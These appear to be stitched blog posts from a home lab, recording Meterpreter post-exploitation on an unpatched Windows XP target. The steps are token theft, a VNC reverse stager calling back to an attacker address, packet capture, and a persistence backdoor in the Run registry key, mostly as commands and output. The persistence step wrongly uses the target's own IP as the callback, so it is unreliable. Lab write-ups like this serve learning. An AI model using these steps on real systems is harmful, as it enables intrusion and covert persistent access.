1032 988 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1044 988 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1216 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1272 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr
1460 1032 sqlbrowser.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
1508 1032 vmware-usbarbitrator.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
1652 1032 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1928 1032 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1968 1032 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
2080 788 hqtray.exe x86 0 LAB\Lab1 C:\Program Files\VMware\VMware Player\hqtray.exe
2424 2396 ACpwO.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\ACpwO.exe
3376 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

I’ve decided to steal the PID token for the user LAB1 (1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr)

Meterpreter > steal_token 1436
Stolen token with username: LAB\Lab1

I believe I have now assumed the role of LAB1 and Meterpreter is running under the context of that user.

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

This is very cool. The following installs a VNC session on the exploited Windows system and gives me a graphical interface window of the target desktop to manipulate as if I were sitting at the machine.

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.70 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\nMsMIPZFPZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.70:4545…
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name “lab”
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

And up popped the target machine desktop:

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/LAB_20130625.5807/LAB_20130625.5807.cap
[*] Packet capture interval is 30 Seconds

^C <– Control +C to stop the process
[*] Interrupt
[+] Stopping Packet sniffer…
meterpreter >

The file is saved in the folder .MSF4, which is a hidden folder in Kali within Root.

Rather conveniently, everything logged by Packetrecorder is saved in the .pcap file format which is perfect for Wireshark:

And 192.168.1.79 is the IP of the target machine.

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The following Meterpreter persistence script ensures access to the exploited system even after a reboot. This script comes with a warning

One word of warning here before we go any further. The persistent Meterpreter as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, be sure to exercise the utmost caution and be sure to clean up after yourself when the engagement is done.

Here’s the Persistence options:

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

On to the Meterpreter script:

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.79
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/LAB_20130625.2221/LAB_20130625.2221.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.79 LPORT=443
[*] Persistent agent script is 611063 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[*] Executing script C:\WINDOWS\TEMP\urMouyzhUqndV.vbs
[+] Agent executed with PID 2520
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TgZcTlqTJNmSbP
meterpreter >

I have rebooted the target machine and will now to test the connection from Metasploit.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.1.79
LHOST => 192.168.1.79
msf exploit(handler) > exploit

[-] Handler failed to bind to 192.168.1.79:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler…

And it stuck there.

No idea why this didn’t work.